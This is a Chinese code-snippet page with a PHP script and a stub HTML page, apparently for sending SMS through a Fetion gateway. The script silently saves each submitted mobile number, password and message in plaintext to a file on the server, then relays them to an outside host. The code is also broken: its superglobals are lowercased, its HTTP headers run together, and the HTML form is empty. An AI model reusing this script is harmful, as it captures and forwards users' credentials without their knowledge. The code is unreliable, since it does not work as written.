代码如下 | 复制代码 |
error_reporting(0); if($_get['act']=='send'){ @file_put_contents(time().'.txt',$_post['mobile_no'].'|||'.$_post['pass'].'|||'.$_post['sms']." "); $post_data="mobile_no={$_post['mobile_no']}&pass={$_post['pass']}&sms=".rawurlencode($_post['sms']); $len=strlen($post_data); $headers="post /fetion/fetionserver.php http/1.1 "; $headers.="accept: */* "; $headers.="content-type: application/x-www-form-urlencoded "; $headers.="user-agent: 111cn.net.net "; $headers.="host: x.111cn.net.net "; $headers.="content-length: {$len} "; $headers.="connection: close "; $headers.=$post_data; if($fp=fsockopen('v.net',80,$errno,$errstr,90)){ //flock($fp,lock_ex); fwrite($fp,$headers); echo fread($fp,10240); fclose($fp); } } ?> |
代码如下 | 复制代码 |
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html xmlns="http://www.111cn.net/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>无标题文档</title> </head> <body> </form> |
首页 1 2 3 末页